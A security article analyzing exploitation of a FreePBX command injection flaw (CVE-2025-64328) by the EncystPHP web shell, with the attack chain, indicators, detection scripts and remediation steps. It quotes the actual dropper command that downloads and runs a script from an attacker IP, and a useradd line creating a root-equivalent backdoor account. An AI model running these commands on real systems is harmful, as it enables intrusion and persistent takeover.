Your phone system is not just a communications tool. It is a Linux server sitting on your network, managing credentials, routing calls, connecting to your database, and — in many deployments — exposed to the internet with an administrative web interface. When that server runs vulnerable software and that interface is reachable, it is not a phone system anymore. It is a foothold.
That is exactly what happened to more than 900 organizations worldwide between December 2025 and late February 2026. A threat actor known as INJ3CTOR3 exploited CVE-2025-64328, a high-severity command injection flaw in Sangoma FreePBX's Endpoint Manager module, to deliver a sophisticated, self-preserving web shell called EncystPHP. The campaign was tracked by Fortinet's FortiGuard Labs, confirmed at scale by The Shadowserver Foundation, and ultimately earned a spot on CISA's Known Exploited Vulnerabilities (KEV) catalog — the federal government's formal acknowledgment that a vulnerability is being actively weaponized in the wild.
This article goes deep on the mechanics. We will look at what FreePBX is and why it matters as an attack surface, exactly what CVE-2025-64328 is and where it lives in the codebase, how EncystPHP was delivered and what it does step by step, the history and business model of INJ3CTOR3, and what the broader implications are for anyone responsible for securing communications infrastructure.
As of late February 2026, the Shadowserver Foundation confirmed over 900 FreePBX instances remain actively compromised and running web shells. If you manage a FreePBX deployment on version 17.0.2.36 or any version between that and 17.0.3, treat your system as fully compromised until proven otherwise. Patching alone is not sufficient — you must also audit for the EncystPHP artifacts described below.
FreePBX as an Attack Surface: The Problem With Internet-Facing PBX
FreePBX is an open-source graphical user interface and administration framework built on top of Asterisk, the widely deployed open-source telephony engine. Sangoma Technologies maintains it and ships it as both standalone software and as part of their commercial PBX Appliance product line. It is used by small businesses, managed service providers, call centers, healthcare organizations, and schools — essentially any organization that wants to run its own phone system without paying enterprise telephony licensing fees.
The deployment model is important to understand. A standard FreePBX installation is a Linux box — typically CentOS or Alma Linux — running Asterisk as the core SIP/RTP engine, with FreePBX layered on top providing a PHP-based web interface for administrators. That web interface, the Administrator Control Panel (ACP), is what gets compromised in this campaign.
FreePBX's ACP is routinely exposed to the internet. This is not purely negligence — it is a practical reality of distributed management. When a Managed Service Provider (MSP) administers dozens of client PBX deployments, those clients' systems are geographically dispersed. The ACP must be reachable. The historical solution has been to either expose it directly or put it behind VPN — and not every operator chooses VPN.
The Endpoint Manager is a FreePBX module that handles provisioning and management of IP phone hardware. It lets administrators push firmware, configure phone models, set extension behavior, and connect the PBX to network storage via SSH and SFTP for file delivery to endpoints. That last function — the SSH connection testing feature — is precisely where CVE-2025-64328 lives.
Anatomy of CVE-2025-64328: The Injection Point
CVE-2025-64328 is classified as a post-authentication command injection vulnerability with a CVSS base score of 8.6 (HIGH). It affects the filestore module within the FreePBX Endpoint Manager's administrative interface, specifically versions 17.0.2.36 and above, up to but not including 17.0.3. The patch was released in version 17.0.3 and announced via FreePBX advisory in November 2025.
"The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host. An attacker could leverage this to obtain remote access to the system as the asterisk user." — FreePBX Security Advisory, November 2025
The vulnerable function is check_ssh_connect(), which is responsible for testing SSH connectivity from the FreePBX server to a configured remote file storage endpoint. The purpose is legitimate: when an administrator sets up a network share or SFTP location for endpoint firmware delivery, the interface provides a "Test Connection" button that invokes this function to verify credentials and reachability.
The underlying problem is that user-supplied input — specifically fields like the hostname, username, or password in the SSH connection form — is passed insufficiently sanitized into a shell command that gets executed server-side. This is the textbook definition of OS command injection (CWE-78). Rather than parameterizing or escaping the input before handing it to a system call, the function constructs a shell command string that incorporates attacker-controlled values. By injecting shell metacharacters such as semicolons, backticks, pipes, or dollar signs with subshell syntax, an attacker can break out of the intended command and execute arbitrary OS commands.
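To make the CWE-78 pattern concrete, here is an added shell illustration, not FreePBX code, of the shape described above: a "test connection" helper that interpolates a form field into a command string that a shell then re-parses, beside a hardened version that validates the hostname against an allow-list and passes it as a single argument so nothing is re-parsed. The function names and the sample hostname are constructed for this example, and `echo` stands in for the real SSH call.

```shell
#!/bin/sh
# Added example: command injection via string interpolation vs. a hardened
# helper. Not FreePBX code; function names and hosts are constructed here.

# 1. VULNERABLE PATTERN. The hostname becomes part of a string that sh -c
#    parses, so ";", "`", "|" or "$(...)" inside it turn into commands.
vulnerable_ssh_probe() {
    host=$1
    sh -c "echo probing $host"      # echo stands in for the ssh call
}

# 2. HARDENED, step one: reject anything that is not a plausible hostname
#    (RFC 1123 labels: alphanumerics and hyphens, joined by dots). An IPv4
#    literal also passes; shell metacharacters never do.
is_valid_hostname() {
    printf '%s' "$1" | grep -Eq \
        '^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# 3. HARDENED, step two: never hand the value to a shell for re-parsing.
#    The whole string is one argv word, so metacharacters are inert even
#    if validation were ever bypassed.
hardened_ssh_probe() {
    host=$1
    if ! is_valid_hostname "$host"; then
        echo "rejected: not a valid hostname" >&2
        return 2
    fi
    echo probing "$host"            # one argument, never re-parsed
}

# Demo with a constructed input that carries a trailing shell command.
bad='pbx.example.com; echo INJECTED'
echo "--- vulnerable helper ---"; vulnerable_ssh_probe "$bad"
echo "--- hardened helper ---";   hardened_ssh_probe "$bad" || echo "refused (status $?)"
echo "--- hardened helper, clean input ---"; hardened_ssh_probe 'pbx.example.com'
```

The vulnerable helper prints a second line, `INJECTED`, because the shell treated the text after the semicolon as a separate command; the hardened helper refuses the same input at validation and, for a clean hostname, passes it through as a single argument. The fix FreePBX shipped in 17.0.3 is in PHP, but the principle is the same: validate, and never build a command line by concatenating user input.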
What makes this particularly dangerous is the execution context. Asterisk — and by extension FreePBX's web processes — typically runs as the asterisk user, a non-root but highly privileged service account with broad filesystem access to the telephony infrastructure. This is enough to read database credentials, write files to web-accessible directories, and interact with all the core components of the PBX. From that position, escalation to full root is achievable through various well-known techniques, which is exactly what EncystPHP does.
The "post-authentication" classification is frequently misread as reducing the severity of a vulnerability. It does not mean "hard to exploit." It means an attacker needs a valid login to the FreePBX ACP. In many deployments, this is trivially achievable via credential stuffing, default credential abuse, phishing an administrator account, or purchasing access through the underground markets that INJ3CTOR3 is known to supply. The CVSS score of 8.6 reflects this reality.
The CPE designation for the vulnerable component is cpe:2.3:a:sangoma:filestore:*:*:*:*:*:freepbx:*:* with versionStartIncluding: 17.0.2.36 and versionEndExcluding: 17.0.3. Proof-of-concept exploit code has been published publicly on GitHub, lowering the bar for exploitation significantly and enabling the kind of automated mass-scanning activity observed in this campaign.
A note on scoring: the 8.6 CVSS score cited throughout this article reflects the CVSSv4.0 rating used in the official Sangoma advisory and by CISA. Readers cross-referencing other databases may see a CVSSv3.1 score of 8.8 HIGH for the same flaw — a difference in scoring methodology, not severity. Both versions assess this as a high-severity vulnerability.
EncystPHP: Delivery and the Attack Chain
Fortinet's FortiGuard Labs, in their January 28, 2026 analysis authored by researcher Vincent Li, traced the attack chain in detail. The initial exploitation was observed originating from Brazil, targeting a victim environment managed by an Indian technology company providing cloud and communication services. This geographic pattern — origin in Brazil, victim in India — is consistent with the global footprint of INJ3CTOR3 infrastructure.
Upon successful exploitation of CVE-2025-64328, the attacker triggered an outbound connection from the compromised FreePBX server to a download server hosted at IP address 45.234.176.202. This IP resolves to the domain crm.razatelefonia.pro, which presents as a VoIP management system with a login interface — a convincing masquerade that could evade basic URL filtering based on domain reputation alone.
The download path used was /new/ on that server, which automatically redirects to a PHP dropper named k.php. The first-stage file downloaded by the victim server is named simply "c" — a shell script that serves as the EncystPHP dropper and orchestrates the entire compromise sequence. The delivery command, recovered from traffic analysis, was:
(setsid wget "hxxp://45[.]234[.]176[.]202/new/k.php" \
-O /var/spool/asterisk/tmp/serv 2>/dev/null >/dev/null; \
bash /var/spool/asterisk/tmp/serv 2>/dev/null > /dev/null &) 2>&1
The use of setsid creates a new session for the process, detaching it from the terminal and making it a session leader. This is a persistence and evasion technique — the process continues running even if the parent shell or SSH session is terminated. Combined with the output redirected to /dev/null, the attacker ensures the execution leaves no visible output trail.
The target directory, /var/spool/asterisk/tmp/, is the Asterisk temporary spool directory — a writable location that belongs to the Asterisk service. Writing here is expected behavior for a legitimate PBX process, which means file creation in this path is less likely to trigger anomaly detection rules compared to writing to /tmp or a web root directly.
Inside EncystPHP: A Six-Stage Compromise
EncystPHP is not a simple web shell. It is a multi-stage attack framework delivered as PHP and shell components that work together to achieve persistent, privileged, covert control over the compromised host. The name "EncystPHP" reflects its design philosophy — like a biological cyst, it encapsulates itself, protects its core, and is difficult to remove without understanding its full structure. The execution chain follows a logical sequence:
Stage 1: Lock Down Legitimate Files
The dropper's first action is to modify the file permissions of two legitimate FreePBX PHP files — ajax.php and model.php — to 000. This renders them completely unreadable, unwritable, and non-executable by any user or process, including root by default (though root can override this). The attacker does this not to destroy functionality but to force the web server to reload them from attacker-controlled versions, and to ensure that monitoring tools checking these files for modification will find them inaccessible rather than tampered — a subtle evasion.
Stage 2: Harvest Credentials
EncystPHP reads /etc/freepbx.conf, the main FreePBX configuration file, which contains database connection credentials including the MySQL username and password used by FreePBX to access its backend database. Exfiltrating these credentials gives the attacker access to all extensions, voicemail accounts, call routing rules, SIP credentials, and potentially integrations with other systems stored in the FreePBX database.
Stage 3: Eliminate Competition and Prior Backdoors
This stage reveals operational sophistication. EncystPHP actively hunts for and deletes other web shells on the compromised system. It scans PHP files for telltale patterns of other shells — Base64 decode functions, packet header manipulation, shell_exec and system() calls — and removes them. It also specifically targets files containing strings like "Badr," "b3d0r," "pastebin," "yokyok," or a specific Base64 token associated with a different malicious actor. This is competitive territory-claiming behavior: INJ3CTOR3 does not want to share access with other threat actors on the same machine.
The malware also deletes cron job entries and a specific list of FreePBX user accounts from the database, including: ampuser, svc_freepbx, freepbx_svc, bluej, nahda, FreePBX_setup, emoadmin, and nvd0rz. The presence of names like "nahda," "bluej," and "b3d0r" in the removal lists suggests these are identifiers associated with competing access brokers or other INJ3CTOR3 operators who may have previously compromised the same systems.
Stage 4: Create Root-Level Persistent Access
EncystPHP creates a new root-level system user named newfpbx using the following command, recovered from the dropper analysis:
useradd -s /bin/bash -ou 0 -g 0 \
-p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
The -ou 0 -g 0 flags assign UID 0 and GID 0, making this user a root equivalent regardless of the username. The password is hardcoded as an MD5-crypt hash — verifiable and consistent across all compromised systems. The attacker also resets multiple existing user account passwords to a single shared value, creating lateral access points throughout the system's user database.
Beyond the local user account, EncystPHP injects an attacker-controlled SSH public key into the authorized_keys file and modifies SSH daemon configuration to ensure port 22 remains open and accessible. These mechanisms provide SSH-level root access that survives web shell removal — meaning an administrator who finds and deletes the PHP files but does not audit SSH keys and system accounts is still completely compromised.
Stage 5: Download Secondary Dropper and Establish Multi-Path Persistence
The "c" dropper fetches a secondary PHP dropper, k.php, which performs a parallel set of persistence actions including deploying its own Base64-encoded web shell. EncystPHP's architecture deliberately uses multiple independent persistence mechanisms so that removing any single artifact does not restore security. FortiGuard Labs documented web shell instances deployed to at least twelve different file paths across the FreePBX web root structure, ensuring alternative access routes remain even if incident responders find some of them.
The shell also installs cron jobs that periodically re-fetch the secondary dropper from the command infrastructure, meaning even if all local artifacts are cleaned, the cron job will re-infect the system the next time it executes — unless it too is explicitly removed.
Stage 6: Clean Evidence and Restore Appearances
In the final stage, EncystPHP demonstrates the kind of operational security awareness that distinguishes professional criminal tooling from amateur malware. It tampers with system and application log files to erase evidence of the initial exploitation and dropper execution. It removes the FreePBX Endpoint Manager module — the very module that contained the exploited vulnerability — which simultaneously eliminates the attack vector for future exploitation by other actors and removes forensic artifacts from the module's own audit logs. Finally, it restores file permissions on FreePBX-related PHP files to their normal values and triggers a FreePBX configuration reload, so that the system appears to function normally. No service outage, no alarm bells, no degradation of call quality — the organization continues using their phone system while the attacker has full control.
FortiGuard Labs' analysis also documents that EncystPHP forges file timestamps on its deployed web shells to match the modification times of legitimate FreePBX files in the same directories. This timestamp manipulation directly counters forensic triage workflows that sort by recently modified files — a common first step when an administrator suspects compromise. A web shell planted in /var/www/html/admin/views/ with a timestamp matching surrounding legitimate files will not stand out in a directory listing, and will be skipped by time-based filesystem audits that only look back a few days. Only hash-based or behavior-based detection will catch it. This detail underscores how carefully EncystPHP has been engineered against realistic incident response procedures — not just against automated security tooling.
EncystPHP masquerades as a legitimate FreePBX file named ajax.php, written to /var/www/html/admin/views/ajax.php. It uses MD5-hashed authentication and presents an interactive interface labeled "Ask Master" with predefined commands for system enumeration, SIP peer listing, and Asterisk channel inspection. Its name, location, and interface structure are designed to survive casual file review.
INJ3CTOR3: A Six-Year History of VoIP Exploitation
To understand why this campaign is so effective, you need to understand who is running it. INJ3CTOR3 is not a new actor. They were first publicly identified and named by Check Point Research in 2020, in a report by researchers Ido Solomon, Ori Hamama, and Omer Ventura. At that time, the group was exploiting CVE-2019-19006, an authentication bypass in FreePBX, to compromise Asterisk-based PBX systems globally.
"The group's main purpose is to sell phone numbers, call plans, and live access to VoIP services compromised as part of the INJ3CTOR attacks." — Check Point Research, 2020
Check Point's analysis revealed that INJ3CTOR3 operated within a broader ecosystem of VoIP fraud, connecting to Facebook groups primarily populated by members from Gaza, the West Bank, and Egypt. These communities traded tools, credentials, access to compromised SIP servers, and knowledge of International Premium Rate Number (IPRN) schemes. The business model is straightforward: compromise a PBX, use it to generate outbound calls to premium-rate numbers that the attacker controls or has an arrangement with, and collect the per-minute revenue before the victim notices unexplained call charges.
In 2022, the group evolved. Rather than continuing to exploit the by-then widely patched CVE-2019-19006, they shifted targeting to systems running the Elastix unified communications platform — a FreePBX-based distribution that had its open-source development discontinued following its acquisition by 3CX in 2016 — via CVE-2021-45461, a remote code execution vulnerability in the Rest Phone Apps (restapps) module used in Digium phones with Elastix and FreePBX. The 2022 campaign was analyzed in depth by Palo Alto Networks Unit 42, whose July 2022 report documented over 500,000 unique malware samples from this family deployed between late December 2021 and the end of March 2022 alone. The pattern was identical: find a vulnerable, internet-facing VoIP system, exploit the administration interface, deploy a web shell, and monetize the telephony access.
The 2025-2026 campaign represents the group's third major pivot to a new CVE, this time CVE-2025-64328 in modern FreePBX 17.x. The consistency is striking: six years, three CVEs, the same fundamental target category (VoIP administrative interfaces), the same monetization approach, and an increasingly sophisticated toolset. EncystPHP represents a meaningful capability upgrade over the simpler web shells used in earlier campaigns.
The attack infrastructure also carries fingerprints. The dropper server domain, crm.razatelefonia.pro, uses "telefonia" — the Spanish and Portuguese word for telephony — as a domain component, consistent with Brazilian-origin infrastructure documented by Fortinet. Strings like "Badr," "b3d0r," and the calling card "inje3t0r3-seraj" appearing in the malware's own removal logic and in previous exploits suggest a small, consistent team with recognizable identifiers that span multiple years of activity.
The Scale: 900+ Compromises and What They Mean
The Shadowserver Foundation, a non-profit that operates global internet scanning and threat intelligence infrastructure, confirmed in late February 2026 that over 900 FreePBX instances remain actively compromised and running web shells. The geographic breakdown, as reported to The Hacker News and Security Affairs, is worth examining closely:
- United States: ~401 compromised hosts — by far the largest concentration, reflecting both the size of the US FreePBX deployment base and the number of instances with internet-exposed ACPs
- Brazil: 51
- Canada: 43
- Germany: 40
- France: 36
- United Kingdom, Italy, Netherlands: dozens each
- Smaller numbers spread across dozens of other countries
These 900+ represent systems that are still actively running web shells as of the reporting date. They are not historical infections that have been cleaned. The actual total number of systems compromised since December 2025 is likely higher, as some organizations may have already remediated while others may not yet have been scanned by Shadowserver's infrastructure.
Consider what 900 compromised PBX systems means in practical terms. Each system routes calls for an organization — a business, a school, a medical office, a government agency. Each system has a database of SIP credentials that can be extracted and resold. Each system has a network position that can serve as a pivot point for attacks against the broader network. And each system is actively generating unauthorized outbound calls, charging those call costs back to the victim organization while the revenue flows to INJ3CTOR3.
CISA KEV Designation: What It Means in Practice
In early February 2026, CISA added CVE-2025-64328 to its Known Exploited Vulnerabilities (KEV) catalog. This designation is significant for several reasons beyond its symbolic weight. Federal agencies under the authority of Binding Operational Directive 22-01 are legally required to remediate KEV catalog vulnerabilities within specified timeframes. For contractors and vendors working with the federal government, KEV designation often triggers contractual obligations to patch.
More broadly, KEV designation is a signal to every security team. CISA does not add theoretical vulnerabilities to the KEV catalog. Every entry represents a vulnerability that has been confirmed as actively and meaningfully exploited against real targets. When CISA says a vulnerability is being exploited, they mean it, and the FreePBX advisory from November 2025 had already gone largely unheeded by the time the KEV designation was issued in February 2026 — a two-month window during which attackers compromised hundreds of systems.
The gap between vulnerability disclosure (November 2025) and KEV designation (February 2026) illustrates a recurring problem in enterprise patch management. Security advisories for infrastructure components like PBX systems frequently receive lower prioritization than operating system or endpoint patches. The assumption — sometimes unconscious — is that a phone system is a low-risk peripheral. This campaign demonstrates exactly how wrong that assumption is.
CVE-2025-64328 is not the only FreePBX vulnerability in CISA's KEV catalog. CVE-2025-57819, a separate and more severe authentication bypass flaw (CVSS 10.0 CRITICAL under CVSSv4.0) in the commercial Endpoint Manager module, was added to KEV in August 2025 — roughly three months earlier. CVE-2025-57819 requires no valid login at all, making it pre-authentication and exploitable against any internet-exposed ACP. If you are auditing your FreePBX exposure, both entries are relevant. CVE-2025-64328 is the vector used specifically in this EncystPHP campaign; CVE-2025-57819 was a distinct, earlier exploitation wave.
The Monetization Layer: International Toll Fraud and Why VoIP Is Lucrative
To fully grasp why INJ3CTOR3 has invested six years in this category of attack, it helps to understand the economics of toll fraud. An International Premium Rate Number (IPRN) operates on a revenue-sharing model: a number in a premium-rate range (often in countries like Latvia, Gambia, Somalia, Guyana, or various Pacific Island nations) generates per-minute charges for every call made to it. The revenue flows to whoever controls the number's termination — which can be arranged without owning telecom infrastructure, through IPRN brokers who operate in gray or outright illegal markets.
A compromised PBX with 100 active SIP trunks can generate enormous call volume in a short period. An attacker who configures the compromised Asterisk instance to dial an IPRN and leave calls connected for hours can generate thousands of dollars in fraudulent charges before the victim's telecom provider or the organization itself notices the anomalous billing. Multiply this across 900 compromised systems and the scale of potential revenue becomes clear.
"The web shell leverages Elastix and FreePBX administrative contexts to operate with elevated privileges, enabling arbitrary command execution and outbound call activity through the compromised PBX environment." — Fortinet FortiGuard Labs, January 2026
EncystPHP's "Ask Master" interface includes predefined commands to list active Asterisk channels and enumerate SIP peers — precisely the reconnaissance needed to understand how to route fraudulent calls most effectively through the compromised infrastructure. The web shell is not just about system access; it is purpose-built for telephony monetization.
MITRE ATT&CK Technique Mapping
The EncystPHP campaign maps cleanly across multiple phases of the MITRE ATT&CK Enterprise framework. Understanding these mappings is useful both for threat hunting and for assessing whether your detection coverage addresses this attacker's methods:
- T1190 — Exploit Public-Facing Application: Initial access via CVE-2025-64328 in the internet-exposed FreePBX Administrator Control Panel.
- T1059.004 — Command and Scripting Interpreter: Unix Shell: Exploitation delivers a shell command through the injectable check_ssh_connect() function, and the dropper script "c" is a bash shell script executed on the victim host.
- T1505.003 — Server Software Component: Web Shell: EncystPHP itself. Deployed to at least twelve file paths across the web root, masquerading as ajax.php.
- T1136.001 — Create Account: Local Account: Creation of the newfpbx user with UID 0 (root equivalent).
- T1098.004 — Account Manipulation: SSH Authorized Keys: Injection of the attacker's SSH public key into authorized_keys and modification of SSH daemon configuration to maintain port 22 access.
- T1053.003 — Scheduled Task/Job: Cron: Cron jobs that periodically re-fetch the secondary dropper from attacker infrastructure, enabling re-infection after partial cleanup.
- T1003 — OS Credential Dumping: Exfiltration of /etc/freepbx.conf to obtain MySQL credentials and SIP account data.
- T1070.006 — Indicator Removal: Timestomp: Forging of file timestamps on deployed web shells to match legitimate files in the same directories, defeating time-based forensic triage.
- T1070.002 — Indicator Removal: Clear Linux or Mac System Logs: Tampering with system and application logs to remove evidence of initial exploitation.
- T1083 — File and Directory Discovery: The "Ask Master" interface includes predefined commands for filesystem enumeration and configuration file retrieval.
- T1499 — Endpoint Denial of Service / T1496 — Resource Hijacking: Unauthorized outbound call generation through the compromised Asterisk instance for toll fraud monetization.
The breadth of ATT&CK coverage in a single campaign is notable. EncystPHP is not a smash-and-grab exploit — it is a full attack lifecycle compressed into a single automated dropper, touching initial access, execution, persistence, privilege escalation, credential access, defense evasion, and impact. An organization whose detection coverage has gaps in any of these phases may observe only part of the chain, giving a false impression of limited compromise.
Detection: Finding EncystPHP on a Compromised System
If you are responsible for a FreePBX 17.x deployment, particularly one running any version between 17.0.2.36 and 17.0.3, a thorough compromise assessment requires checking beyond just the patch version. EncystPHP's multi-path persistence means a patched system can still be fully backdoored.
The primary indicators to look for, based on FortiGuard Labs' analysis and published IOCs, include:
- The presence of ajax.php in /var/www/html/admin/views/ with unexpected content, or permissions set to 000 on legitimate files in that directory
- Any PHP file containing the string "Ask Master" or MD5 authentication comparisons against hardcoded hashes
- PHP files whose timestamps match surrounding legitimate files but whose content or hash does not match a clean FreePBX installation — EncystPHP forges timestamps specifically to defeat time-based triage
- A system user named newfpbx with UID 0 (root equivalent)
- SSH authorized keys containing entries not placed by your administration team
- Cron jobs referencing /var/spool/asterisk/tmp/ or making outbound connections to 45.234.176.202 or crm.razatelefonia.pro
- Missing or corrupted /etc/freepbx.conf
- Absence of the FreePBX Endpoint Manager module (the attacker removes it)
- Suspicious outbound call activity, particularly to obscure international destinations or premium-rate number ranges
A quick filesystem audit targeting likely web shell locations can be performed with:
# Search for suspicious PHP files in the web root. Note: EncystPHP forges
# mtimes, so the -newer filter can miss it; the string-based pass below
# does not depend on timestamps. The bare "system" pattern is deliberately
# broad and will also match words like "filesystem"; review hits by hand.
find /var/www/html -name "*.php" -newer /etc/hosts \
    -exec grep -l "base64_decode\|shell_exec\|system\|passthru" {} \;
# String-based check for known EncystPHP markers (timestamp forgery defeats mtime checks)
grep -rl "Ask Master\|base64_decode.*eval\|shell_exec\|passthru" \
    /var/www/html/admin/ 2>/dev/null
# Check for unexpected UID 0 users (anything here other than root is suspect)
awk -F: '($3 == 0) {print}' /etc/passwd
# Audit crontabs for all users (user names are quoted in case of odd entries)
for user in $(cut -f1 -d: /etc/passwd); do
    crontab -l -u "$user" 2>/dev/null | grep -v "^#" | \
        grep . && echo " ^ user: $user"
done
# Also check system-level cron locations the per-user listing does not cover
grep -r . /etc/cron.d/ /etc/crontab /var/spool/cron/ 2>/dev/null | grep -v ":#"
# Check authorized_keys for all users, printing which file each key came from
find /home /root -name "authorized_keys" \
    -exec sh -c 'echo "== $1"; cat "$1"' _ {} \;
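The one-liners above are fine for a quick look. For something repeatable, here is an added set of shell helpers, not FortiGuard or Sangoma tooling, that encode the same indicators as functions taking explicit paths, so they can be pointed at a mounted disk image or at test fixtures rather than the live host. The function names are ours, and the demo at the bottom runs against constructed sample files (a passwd entry, two cron files, a small web root, and an SSH key list) created in a temporary directory.

```shell
#!/bin/sh
# Added compromise-assessment helpers for the EncystPHP indicators. Not
# FortiGuard or Sangoma tooling; function names are constructed here, and
# every check takes explicit paths so it never has to touch the live host.

# 1. Any UID 0 account other than root (the dropper adds "newfpbx" with
#    useradd -ou 0 -g 0). Argument: a passwd file. Prints offending names.
find_uid0_users() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# 2. Cron files referencing the dropper's spool path or the download host
#    and domain reported by FortiGuard Labs. Arguments: crontab files or
#    directories. Prints matching file names; prints nothing when clean.
find_cron_iocs() {
    find "$@" -type f -exec grep -lE \
        '/var/spool/asterisk/tmp/|45\.234\.176\.202|razatelefonia\.pro' {} + \
        2>/dev/null
    return 0
}

# 3. PHP files under a web root carrying the "Ask Master" banner, plus any
#    file whose mode was dropped to 000 (stage 1 of the dropper). mtime is
#    deliberately ignored: timestomping makes -newer/-mtime filters unreliable.
find_webshell_candidates() {
    find "$1" -type f -name '*.php' -exec grep -l 'Ask Master' {} + 2>/dev/null
    find "$1" -type f -perm 0000 2>/dev/null
    return 0
}

# 4. authorized_keys lines whose key body (second field) is not in an
#    allow-list of keys your team actually issued. Prints the key comment.
#    Arguments: $1 = authorized_keys, $2 = allow-list file (same format).
find_unknown_ssh_keys() {
    awk 'FILENAME == ARGV[1] { issued[$2] = 1; next }
         NF >= 2 && !($2 in issued) { print $3 }' "$2" "$1"
}

# ---- demo on constructed fixtures; nothing on the real system is read ----
FIXTURE_DIR=$(mktemp -d)
trap 'rm -rf "$FIXTURE_DIR"' EXIT

build_fixtures() {
    d=$1
    mkdir -p "$d/cron.d" "$d/admin/views"
    # passwd with a constructed root-equivalent account
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'asterisk:x:995:992::/var/lib/asterisk:/sbin/nologin' \
        'newfpbx:x:0:0::/home/newfpbx:/bin/bash' > "$d/passwd"
    # one benign cron file and one constructed re-fetch job
    printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/cron.d/logrotate"
    printf '*/30 * * * * asterisk bash /var/spool/asterisk/tmp/serv\n' > "$d/cron.d/refetch"
    # web root: a banner-carrying file, a clean file, and a 000-mode file
    printf '<?php /* Ask Master */ ?>\n' > "$d/admin/views/ajax.php"
    printf '<?php echo "clean"; ?>\n' > "$d/admin/views/model.php"
    printf '<?php ?>\n' > "$d/admin/views/locked.php"
    chmod 000 "$d/admin/views/locked.php"
    # keys: one the team issued, one nobody recognises (both constructed)
    printf 'ssh-ed25519 AAAAC3ISSUEDKEY ops@corp.example\n' > "$d/allowlist"
    printf 'ssh-ed25519 AAAAC3ISSUEDKEY ops@corp.example\n' > "$d/authorized_keys"
    printf 'ssh-rsa AAAAB3UNKNOWNKEY unknown@nowhere\n' >> "$d/authorized_keys"
}

build_fixtures "$FIXTURE_DIR"
echo "extra UID 0 users:";    find_uid0_users "$FIXTURE_DIR/passwd"
echo "cron files with IOCs:"; find_cron_iocs "$FIXTURE_DIR/cron.d"
echo "web shell candidates:"; find_webshell_candidates "$FIXTURE_DIR/admin"
echo "unknown SSH keys:";     find_unknown_ssh_keys "$FIXTURE_DIR/authorized_keys" "$FIXTURE_DIR/allowlist"
```

On a real host the same functions would be pointed at /etc/passwd, at /etc/cron.d and /var/spool/cron, at /var/www/html/admin, and at each account's authorized_keys with an allow-list your team maintains. Any output is a reason to follow the full remediation list below, not a verdict on its own: a clean result from these checks does not prove the absence of the other persistence paths the article describes.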
FortiGuard Labs explicitly states: "Organizations should treat any successful exploitation of this vulnerability as a full compromise and prioritize immediate remediation, monitoring, and security hardening to mitigate further impact." This means that patching alone, or removing the web shell alone, is insufficient. A compromised system requires full incident response: credential rotation, SSH key audit, user account audit, log review, and network traffic analysis for data exfiltration.
Remediation: What Full Recovery Actually Requires
The minimum required action is updating the filestore module to version 17.0.3 or later. But for systems that were vulnerable during the exploitation window (December 2025 onward), the remediation checklist is substantially longer:
- Isolate the affected PBX server from the network before beginning forensics. A live compromised system with active cron-based re-infection will undo cleanup work.
- Update to FreePBX 17.0.3 or later via the Module Admin interface to close the CVE-2025-64328 attack vector.
- Audit all filesystem artifacts. Check the twelve-plus file paths where EncystPHP deploys web shells. Do not limit the search to known paths — use hash and behavior-based scanning.
- Remove all unauthorized cron jobs. Check system-level crontabs (/etc/cron.d/, /var/spool/cron/) as well as user-level crontabs for the asterisk, apache/httpd, and root users.
- Purge all unauthorized user accounts, specifically newfpbx and any other UID 0 accounts created by the malware.
- Rotate all credentials. This includes FreePBX admin passwords, database credentials (MySQL), SIP account passwords, and any external service integrations. EncystPHP harvested /etc/freepbx.conf — assume those credentials are compromised.
- Audit and clean SSH authorized_keys on all user accounts.
- Review call logs for anomalous outbound activity, particularly to premium-rate international destinations. Contact your SIP provider if suspicious traffic is found.
- Restrict ACP access post-remediation to specific trusted IP ranges or behind a VPN. The ACP should not be internet-accessible without strong controls.
- Enable multi-factor authentication on all administrative accounts.
The Deeper Lesson: Infrastructure Blind Spots and the Security Debt Model
CVE-2025-64328 and the EncystPHP campaign are not anomalies. They are the predictable output of a structural problem in how organizations think about — and budget for — security across their technology stack.
Enterprise security programs have matured significantly around endpoints, email, and cloud infrastructure. Endpoint Detection and Response (EDR), email filtering, SIEM integration, and zero-trust network architecture are well-understood and widely deployed. But the infrastructure layer — the systems that run telephony, physical access control, building automation, industrial control, and similar operational technology — remains largely outside the standard security umbrella.
PBX systems are rarely included in vulnerability scanning programs. They are rarely covered by EDR solutions. Their logs rarely feed into SIEM. They are often managed by a telecommunications team rather than the security team, creating ownership gaps. And when vendors publish security advisories for them, those advisories frequently sit unread in inboxes that security staff do not monitor.
INJ3CTOR3 understands this better than many security teams. They have been exploiting precisely this gap for six years, pivoting from CVE to CVE as each is patched, maintaining consistent access to a category of target that provides reliable monetization with low detection risk. The sophistication of EncystPHP — its competitive removal of rival web shells, its multi-path persistence, its evidence tampering, its functional masquerade as a legitimate file — reflects an attacker who has learned from operational experience exactly what defenders do and do not check.
The fact that 400 of the 900+ compromised systems are located in the United States, a country with among the most mature enterprise security programs in the world, suggests that even well-resourced organizations are leaving VoIP infrastructure in a de facto unmonitored state. This is a security debt problem. Every quarter that a FreePBX system runs without being included in vulnerability scanning, without its logs reviewed, without its administrative access hardened, is a quarter of accumulated risk waiting for the next CVE announcement.
The post-authentication classification of this vulnerability invites one more difficult question: how did attackers obtain valid credentials for so many FreePBX administrative interfaces? Some were likely default credentials that were never changed. Some were probably obtained through credential stuffing attacks using lists compiled from other breaches. Some may have come from phishing. And some — given INJ3CTOR3's known participation in underground markets — were almost certainly purchased. The underground economy for VoIP access credentials is well-established. Securing the login form is not sufficient if the credentials themselves are available for purchase.
Key Takeaways
- VoIP and PBX systems are not peripheral devices — they are full Linux servers: They deserve the same vulnerability management, log monitoring, and access controls applied to any other server in your environment. Treat FreePBX, Asterisk, and similar systems as first-class assets in your security program.
- Post-authentication does not mean low-risk: CVE-2025-64328 required a valid login, which attackers obtained at scale across 900+ targets. Default credential hygiene, MFA, and access restriction to the administrative panel are non-optional controls for internet-facing PBX management interfaces.
- EncystPHP survives patching: Systems compromised before patching require full incident response. SSH keys, user accounts, cron jobs, and database credentials must all be audited and rotated. Patching closes the entry point; it does not evict the attacker already inside.
